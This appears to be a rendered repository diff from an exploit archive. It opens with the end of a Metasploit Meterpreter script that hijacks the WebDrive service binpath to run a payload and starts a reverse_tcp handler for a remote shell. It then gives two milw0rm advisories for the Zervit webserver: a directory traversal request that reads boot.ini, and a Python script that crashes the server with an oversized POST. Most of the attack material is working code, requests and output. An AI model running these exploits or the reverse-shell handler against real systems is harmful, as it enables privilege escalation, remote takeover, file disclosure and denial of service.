# Stop the vulnerable service
|
||||
print_status("Stopping service \"#{sname}\"...")
|
||||
client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'})
|
||||
|
||||
# Set exe payload as service binpath
|
||||
print_status("Setting \"#{sname}\" to #{tempexe}...")
|
||||
client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})
|
||||
sleep(1)
|
||||
|
||||
# Restart the service
|
||||
print_status("Restarting the \"#{sname}\" service...")
|
||||
client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'})
|
||||
|
||||
# Our handler to recieve the callback.
|
||||
handler = client.framework.exploits.create("multi/handler")
|
||||
handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
|
||||
handler.datastore['LHOST'] = rhost
|
||||
handler.datastore['LPORT'] = rport
|
||||
handler.datastore['ExitOnSession'] = false
|
||||
|
||||
handler.exploit_simple(
|
||||
'Payload' => handler.datastore['PAYLOAD'],
|
||||
'RunAsJob' => true
|
||||
)
|
||||
|
||||
# Set service binpath back to normal
|
||||
client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'})
|
||||
|
||||
end
|
||||
end
|
|
@ -1,27 +1,27 @@
|
|||
#################### Zervit Webserver Directory Traversal ############################
|
||||
|
||||
|
||||
############### By: e.wiZz!
|
||||
|
||||
###############Site: www.balcansecurity.com
|
||||
|
||||
|
||||
############### Found with ServMeNot (world's sexiest fuzzer :P )
|
||||
|
||||
|
||||
|
||||
In the wild...
|
||||
|
||||
########################################################################################
|
||||
|
||||
#Site: http://zervit.sourceforge.net/
|
||||
|
||||
#Info: Zervit is the first compact, portable HTTP/Web Server made for human beings.
|
||||
It is being developed thinking in the people that will make use of it and tries to make itself intuitive.
|
||||
It aims to make file sharing or displaying a web easier than the current servers do.
|
||||
|
||||
#Vulnerability:
|
||||
|
||||
http://[site]/../../../../../../boot.ini
|
||||
|
||||
# milw0rm.com [2009-04-16]
|
||||
#################### Zervit Webserver Directory Traversal ############################
|
||||
|
||||
|
||||
############### By: e.wiZz!
|
||||
|
||||
###############Site: www.balcansecurity.com
|
||||
|
||||
|
||||
############### Found with ServMeNot (world's sexiest fuzzer :P )
|
||||
|
||||
|
||||
|
||||
In the wild...
|
||||
|
||||
########################################################################################
|
||||
|
||||
#Site: http://zervit.sourceforge.net/
|
||||
|
||||
#Info: Zervit is the first compact, portable HTTP/Web Server made for human beings.
|
||||
It is being developed thinking in the people that will make use of it and tries to make itself intuitive.
|
||||
It aims to make file sharing or displaying a web easier than the current servers do.
|
||||
|
||||
#Vulnerability:
|
||||
|
||||
http://[site]/../../../../../../boot.ini
|
||||
|
||||
# milw0rm.com [2009-04-16]
|
||||
|
|
|
@ -1,63 +1,63 @@
|
|||
####################### Zervit webserver 0.4 Directory Traversal & Memory Corruption #########
|
||||
|
||||
|
||||
By: e.wiZz! & shinnai
|
||||
|
||||
Site: shinnai.net & balcansecurity.com
|
||||
|
||||
|
||||
|
||||
[Memory Corruption]
|
||||
########################################################################
|
||||
|
||||
import socket
|
||||
|
||||
host = "127.0.0.1"
|
||||
port = 8080
|
||||
|
||||
try:
|
||||
for i in range(1,10):
|
||||
buff = "a" * 3330
|
||||
request = "POST " + buff + " HTTP/1.0"
|
||||
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
connection.connect((host, port))
|
||||
connection.send(request)
|
||||
except:
|
||||
raw_input('\n\nUnable to connect. Press "Enter" to quit...')
|
||||
|
||||
|
||||
|
||||
[Directory traversal]
|
||||
#################################################################################
|
||||
|
||||
[Request]
|
||||
|
||||
GET /../../../../../boot.ini HTTP/1.1
|
||||
User-Agent: Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1
|
||||
Host: localhost:80
|
||||
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
|
||||
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
|
||||
Connection: Keep-Alive, TE
|
||||
TE: deflate, gzip, chunked, identity, trailers
|
||||
#################################################
|
||||
|
||||
[Response]
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Server: Zervit 0.4
|
||||
X-Powered-By: Carbono
|
||||
Connection: close
|
||||
Accept-Ranges: bytes
|
||||
Content-Type: application/octet-stream
|
||||
Content-Length: 355
|
||||
|
||||
[boot loader]
|
||||
timeout=30
|
||||
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
|
||||
[operating systems]
|
||||
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /NOEXECUTE=OPTIN /FASTDETECT
|
||||
##################################################
|
||||
|
||||
# milw0rm.com [2009-05-13]
|
||||
####################### Zervit webserver 0.4 Directory Traversal & Memory Corruption #########
|
||||
|
||||
|
||||
By: e.wiZz! & shinnai
|
||||
|
||||
Site: shinnai.net & balcansecurity.com
|
||||
|
||||
|
||||
|
||||
[Memory Corruption]
|
||||
########################################################################
|
||||
|
||||
import socket
|
||||
|
||||
host = "127.0.0.1"
|
||||
port = 8080
|
||||
|
||||
try:
|
||||
for i in range(1,10):
|
||||
buff = "a" * 3330
|
||||
request = "POST " + buff + " HTTP/1.0"
|
||||
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
connection.connect((host, port))
|
||||
connection.send(request)
|
||||
except:
|
||||
raw_input('\n\nUnable to connect. Press "Enter" to quit...')
|
||||
|
||||
|
||||
|
||||
[Directory traversal]
|
||||
#################################################################################
|
||||
|
||||
[Request]
|
||||
|
||||
GET /../../../../../boot.ini HTTP/1.1
|
||||
User-Agent: Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1
|
||||
Host: localhost:80
|
||||
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
|
||||
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
|
||||
Connection: Keep-Alive, TE
|
||||
TE: deflate, gzip, chunked, identity, trailers
|
||||
#################################################
|
||||
|
||||
[Response]
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Server: Zervit 0.4
|
||||
X-Powered-By: Carbono
|
||||
Connection: close
|
||||
Accept-Ranges: bytes
|
||||
Content-Type: application/octet-stream
|
||||
Content-Length: 355
|
||||
|
||||
[boot loader]
|
||||
timeout=30
|
||||
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
|
||||
[operating systems]
|
||||
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /NOEXECUTE=OPTIN /FASTDETECT
|
||||
##################################################
|
||||
|
||||
# milw0rm.com [2009-05-13]
|
||||
|
|
Loading…
Add table
Reference in a new issue